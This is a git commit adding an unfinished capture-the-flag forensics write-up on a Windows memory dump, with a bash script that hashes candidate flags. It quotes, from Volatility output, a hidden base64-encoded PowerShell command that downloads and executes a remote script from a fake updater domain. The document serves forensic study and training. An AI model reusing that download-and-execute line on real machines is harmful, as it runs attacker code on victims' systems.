add ongoing work

2021-12-03 17:22:51 +01:00
parent 3a7fe25974
commit 07bdcd4f73
2 changed files with 122 additions and 13 deletions
--- a/forensics/honeypot/README.md
+++ b/forensics/honeypot/README.md
@@ -0,0 +1,105 @@
+# Honeypot
+
+Santa really encourages people to be at his good list but sometimes he is a bit
+naughty himself. He is using a Windows 7 honeypot to capture any suspicious
+action. Since he is not a forensics expert, can you help him identify any
+indications of compromise?
+
+1. Find the full URL used to download the malware.
+2. Find the malicious's process ID.
+3. Find the attackers IP
+
+Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}
+Download Link: http://46.101.25.140/forensics_honeypot.zip
+
+## Flag
+
+## Progress so far
+
+- The honeypot.zip file contains ä windows memory dump
+- By using the `volatility3` framework one can extract data from the dump
+- By checking `vol -f honeypot.raw windows.cmdline.CMDLine` the malicious process is quite obvious
+
+```bash
+cat win_cmdline
+
+... snip ...
+
+3504  VBoxTray.exe  "C:\Windows\System32\VBoxTray.exe"
+3112  WmiPrvSE.exe  C:\Windows\system32\wbem\wmiprvse.exe
+3324  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe"
+3344  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe"
+SCODEF:3324 CREDAT:14337
+2700  powershell.exe
+"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e
+aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
+3732  conhost.exe \??\C:\Windows\system32\conhost.exe
+"288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
+4028  whoami.exe  Required memory at 0x7ffdf010 is not valid (process exited?)
+4036  HOSTNAME.EXE  Required memory at 0x7ffd7010 is not valid (process
+exited?)
+2924  DumpIt.exe  "C:\Users\Santa\Desktop\DumpIt.exe"
+2920  conhost.exe \??\C:\Windows\system32\conhost.exe
+"280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
+168 dllhost.exe C:\Windows\system32\DllHost.exe
+/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
+```
+
+- The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url
+- The PID of said command is 2700
+- By examining the currently active connections, using `vol -f honeypot.raw windows.netscan.Netscan` the following foreign IPs stand out:
+
+```
+Volatility 3 Framework 1.0.1
+Offset    Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner
+Created
+
+0x2554b460  TCPv4 10.0.2.15 49226   93.184.220.29 80  ESTABLISHED - - -
+0x261e9d30  TCPv4 10.0.2.15 49228   172.67.177.22 443 ESTABLISHED - - -
+0x3e2e9cc0  TCPv4 10.0.2.15 49221   212.205.126.106 443 ESTABLISHED - - -
+0x3ee98d80  TCPv4 10.0.2.15 49229   147.182.172.189 4444  ESTABLISHED - - -
+0x3f1b0df8  TCPv4 10.0.2.15 49216   212.205.126.106 443 ESTABLISHED - - -
+0x3f225df8  TCPv4 10.0.2.15 49222   212.205.126.106 443 ESTABLISHED - - -
+0x3f547008  TCPv4 10.0.2.15 49220   212.205.126.106 443 ESTABLISHED - - -
+0x3f561438  TCPv4 10.0.2.15 49215   204.79.197.203  443 ESTABLISHED - - -
+0x3f57c438  TCPv4 10.0.2.15 49218   95.100.210.141  443 ESTABLISHED - - -
+0x3f58b4c8  TCPv4 10.0.2.15 49217   212.205.126.106 443 ESTABLISHED - - -
+0x3f58c748  TCPv4 10.0.2.15 49223   212.205.126.106 443 ESTABLISHED - - -
+0x3f58e9d8  TCPv4 10.0.2.15 49225   172.67.177.22 443 ESTABLISHED - - -
+0x3f5c6df8  TCPv4 10.0.2.15 49219   95.100.210.141  443 ESTABLISHED - - -
+```
+
+- By eliminating all the ips which belong to M$ we end up with a small set of 5 ips.
+- To generate the flag the follwing shell script was used, sadly with no success.
+- I'm unsure about the `... | md5sum` part as this adds a hyphen...
+
+```cat generate_flags.sh
+#!/bin/bash
+
+list=(
+  147.182.172.189 # digital ocean
+  #172.67.177.22 # cloudflare net
+  #212.205.126.106 # greece
+  #93.184.220.29 # edgecast
+  #95.100.210.141 # akamai
+)
+
+pids=(
+  1556 # explorer
+  2460 # SearchFilterHo
+  2856 # explorer
+  3324 # iexplorer
+  3344 # iexplorer
+)
+
+for ip in ${list[@]}; do
+  for pid in ${pids[@]}; do
+    echo Generating Flag for $ip and $pid:
+    echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}"
+    echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}"
+  done
+done
+```
+
+
+- I don't know, maybe the challenge is borked somehow?
--- a/forensics/honeypot/generate_flags.sh
+++ b/forensics/honeypot/generate_flags.sh
@@ -1,21 +1,25 @@
 #!/bin/bash

 list=(
-  10.0.2.15
-  127.0.0.1
-  65.55.44.109
-  147.182.172.189
-  172.67.177.22
-  204.79.197.203
-  212.205.126.106
-  93.184.220.29
-  95.100.210.141
+  147.182.172.189 # digital ocean
+  #172.67.177.22 # cloudflare net
+  #212.205.126.106 # greece
+  #93.184.220.29 # edgecast
+  #95.100.210.141 # akamai
 )

+pids=(
+  1556 # explorer
+  2460 # SearchFilterHo
+  2856 # explorer
+  3324 # iexplorer
+  3344 # iexplorer
+)

 for ip in ${list[@]}; do
-  echo Generating Flag from $ip:
-  echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}"
-  echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}"
+  for pid in ${pids[@]}; do
+    echo Generating Flag for $ip and $pid:
+    echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}"
+    echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}"
+  done
 done
-